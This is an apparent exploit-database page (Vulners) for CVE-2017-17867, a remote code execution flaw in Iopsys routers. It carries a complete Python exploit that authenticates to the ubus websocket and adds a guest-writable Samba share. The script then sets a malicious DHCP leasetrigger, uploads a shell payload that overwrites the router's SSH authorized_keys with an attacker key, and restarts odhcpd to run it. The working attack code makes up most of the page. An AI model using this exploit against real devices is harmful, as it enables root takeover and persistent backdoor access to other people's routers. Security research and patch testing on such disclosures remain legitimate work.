Vulners
Lucene search
Iopsys Router - dhcp Remote Code Execution
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2017-17867 | 4 Jan 201819:29 | – | attackerkb |
 | CVE-2017-17867 | 4 Jan 201819:00 | – | cve |
 | CVE-2017-17867 | 4 Jan 201819:00 | – | cvelist |
 | Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated) | 18 Jan 202100:00 | – | exploitdb |
 | CVE-2017-17867 | 4 Jan 201819:29 | – | nvd |
 | CVE-2017-17867 | 4 Jan 201819:29 | – | osv |
 | Iopsys Router dhcp Remote Code Execution | 4 Jan 201800:00 | – | packetstorm |
| Inteno IOPSYS 3.16.4 Root Filesystem Access | 18 Jan 202100:00 | – | packetstorm |
 | Design/Logic Flaw | 4 Jan 201819:29 | – | prion |
#!/usr/bin/python
import json
import sys
import subprocess
import socket
import os
from time import sleep
from websocket import create_connection
def ubusAuth(host, username, password):
ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
req = json.dumps({"jsonrpc":"2.0","method":"call",
"params":["00000000000000000000000000000000","session","login",
{"username": username,"password":password}],
"id":666})
ws.send(req)
response = json.loads(ws.recv())
ws.close()
try:
key = response.get('result')[1].get('ubus_rpc_session')
except IndexError:
return(None)
return(key)
def ubusCall(host, key, namespace, argument, params={}):
ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
req = json.dumps({"jsonrpc":"2.0","method":"call",
"params":[key,namespace,argument,params],
"id":666})
ws.send(req)
response = json.loads(ws.recv())
ws.close()
try:
result = response.get('result')[1]
except IndexError:
if response.get('result')[0] == 0:
return(True)
return(None)
return(result)
if __name__ == "__main__":
host = "192.168.1.1"
payload = """
#!/bin/sh
/bin/echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAkQMU/2HyXNEJ8gZbkxrvLnpSZ4Xz+Wf3QhxXdQ5blDI5IvDkoS4jHoi5XKYHevz8YiaX8UYC7cOBrJ1udp/YcuC4GWVV5TET449OsHBD64tgOSV+3s5r/AJrT8zefJbdc13Fx/Bnk+bovwNS2OTkT/IqYgy9n+fKKkSCjQVMdTTrRZQC0RpZ/JGsv2SeDf/iHRa71keIEpO69VZqPjPVFQfj1QWOHdbTRQwbv0MJm5rt8WTKtS4XxlotF+E6Wip1hbB/e+y64GJEUzOjT6BGooMu/FELCvIs2Nhp25ziRrfaLKQY1XzXWaLo4aPvVq05GStHmTxb+r+WiXvaRv1cbQ== rsa-key-20170427" > /etc/dropbear/authorized_keys
/usr/sbin/odhcpd-update
exit 0
"""
print("Authenticating...")
key = ubusAuth(host, "user", "password")
if (not key):
print("Auth failed!")
sys.exit(1)
print("Got key: %s" % key)
print("Adding Samba share...")
smbcheck = json.dumps(ubusCall(host, key, "uci", "get",
{"config":"samba"}))
if ("pwned" in smbcheck):
print("Samba share seems to already exist, skipping")
else:
smba = ubusCall(host, key, "uci", "add",
{"config":"samba", "type":"sambashare", "values":
{"name":"pwned", "read_only":"no", "create_mask":"0775", "dir_mask":"0775",
"path":"/mnt/", "guest_ok":"yes"}})
if (not smba):
print("Adding Samba share failed!")
sys.exit(1)
print("Enabling Samba...")
smbe = ubusCall(host, key, "uci", "set",
{"config":"samba", "type":"samba", "values":
{"interface":"lan"}})
if (not smbe):
print("Enabling Samba failed!")
sys.exit(1)
print("Committing changes...")
smbc = ubusCall(host, key, "uci", "commit",
{"config":"samba"})
if (not smbc):
print("Committing changes failed!")
sys.exit(1)
print("Setting malicious leasetrigger...")
lts = ubusCall(host, key, "uci", "set",
{"config":"dhcp", "type":"odhcpd", "values":
{"leasetrigger":"/mnt/pwn.sh"}})
if (not lts):
print("Setting leasetrigger failed!")
sys.exit(1)
print("Committing changes...")
ltc = ubusCall(host, key, "uci", "commit",
{"config":"dhcp"})
if (not ltc):
print("Committing changes failed!")
sys.exit(1)
print("Rebooting system...")
reb = ubusCall(host, key, "juci.system", "reboot")
if (not reb):
print("Rebooting failed, try rebooting manually!")
sys.exit(1)
print("Waiting on reboot...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
isUp = None
while (not isUp):
try:
sleep(10)
s.connect((host, 8080))
isUp = True
s.close()
except:
pass
print("Creating temp file for payload...")
with open(".payload.tmp","a+") as file:
file.write(payload)
path = os.path.realpath(file.name)
print("Dropping payload...")
subprocess.run(r"smbclient \\\\%s\\pwned p -c 'put %s pwn.sh'" % (host, path),
shell=True, check=True)
print("Payload dropped")
print("Authenticating...")
key = ubusAuth(host, "user", "password")
if (not key):
print("Auth failed!")
sys.exit(1)
print("Got key: %s" % key)
print("Executing payload")
eec = ubusCall(host, key, "juci.service", "stop",
{"name":"odhcpd"})
if (not eec):
print("Stopping odhcpd failed!")
sys.exit(1)
ees = ubusCall(host, key, "juci.service", "start",
{"name":"odhcpd"})
if (not ees):
print("Starting odhcpd failed!")
sys.exit(1)
print("Cleaning up...")
os.remove(path)
print("Exploitation complete")
# 0day.today [2018-02-20] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Jan 2018 00:00Current
8.7High risk
Vulners AI Score8.7
EPSS0.19814